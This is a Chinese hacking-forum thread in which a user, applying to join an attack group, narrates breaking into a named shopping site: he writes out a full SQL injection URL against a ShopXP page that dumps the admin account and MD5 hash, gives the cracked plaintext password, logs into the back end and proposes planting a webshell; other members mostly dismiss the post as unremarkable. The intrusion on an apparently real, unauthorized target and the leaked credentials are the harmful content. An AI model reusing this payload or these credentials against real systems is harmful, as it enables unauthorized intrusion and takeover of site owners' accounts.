申请加入攻防小组

385895133 · 发表于 2015-11-28 20:53:51

本帖最后由 385895133 于 2015-11-28 21:01 编辑

今天想加入攻防小组试试

不说废话直接入正题

找了个站点

目标站点http://591whc.com/

先打开看看 QQ截图20151128203257.png

看那价格我就下尿了

好了转回了

额用站长看了看ip 额是福建的 QQ截图20151128203956.png

不管他随便点了个产品进去发现 asp的网站

先试试注入 and 1=1 额.....跳的主页了

先试下后台吧看看admin 对不对

运气不错 QQ截图20151128204413.png

咦发现居然是shopxplogin.asp的后台

看来今天运气真好既然是shopxplogin.asp

都不用试其他方法了

直接爆数据库吧

在网站http://591whc.com/后面加入TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin回车

QQ截图20151128204844.png

出来了 admin 是账号后面的faada90e895ea17b不用我说大家也知道是md5密码了吧

去解密吧

得到密码luoxinruias

登陆试试 QQ截图20151128205152.png

ok 就这样成功了

asp的网站么直接挂小马就ok 了

不浪费大家时间了

教程到此结束

BY:啊睿

最后啰嗦一句管理大大求通过么么哒

H.U.C-Star · 发表于 2015-11-28 21:03:47

好好起个ID多在论坛活跃一段时间吧！

wuyan · 发表于 2015-11-28 21:05:06

不通过，一点亮点都没有，还有楼主的id和头像太过于非主流

evilhat · 发表于 2015-11-28 21:06:29

怎么说呢，过程简单无亮点，只是进了后台，后续呢？？

xiaoye · 发表于 2015-11-28 21:21:20

你能详细在详细吗？你让高手意会，但别人一看就觉得太过于简单、

No0d1es · 发表于 2015-11-29 00:35:30

"asp的站么直接挂小马就ok了" 真有这么简单？求普及你这个强大的0day----asp的站直接挂上小马，我想学习学习。

No0d1es · 发表于 2015-11-29 00:35:37

"asp的站么直接挂小马就ok了" 真有这么简单？求普及你这个强大的0day----asp的站直接挂上小马，我想学习学习。

昊情· · 发表于 2015-11-29 08:31:46

多在论坛活跃活跃！

Attack · 发表于 2015-11-29 09:37:37

亮点在哪呢？

08sec-君子 · 发表于 2015-11-29 15:58:25

下面90回复

申请加入攻防小组

评分

指导单位

旗下站点

联系我们